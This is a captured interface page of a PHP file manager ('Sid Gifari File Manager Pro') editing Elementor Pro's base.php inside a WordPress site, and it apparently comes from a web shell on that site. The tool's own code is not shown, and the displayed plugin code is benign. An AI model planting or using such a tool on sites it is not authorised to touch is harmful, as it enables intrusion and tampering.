🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-14 15:47:17 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
digitalsangita.com
/
wp-content
/
plugins
/
elementor-pro
/
core
/
data
/
endpoints
📍 /home/therahul/digitalsangita.com/wp-content/plugins/elementor-pro/core/data/endpoints
🔄 Refresh
✏️
Editing: base.php
Writable
<?php namespace ElementorPro\Core\Data\Endpoints; use ElementorPro\Core\Data\Controller; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Base { protected $controller; protected function register() {} /** * Endpoint constructor. * * runs `$this->register()`. * * @param Controller $controller */ public function __construct( Controller $controller ) { $this->controller = $controller; $this->register(); } }
💾 Save Changes
❌ Cancel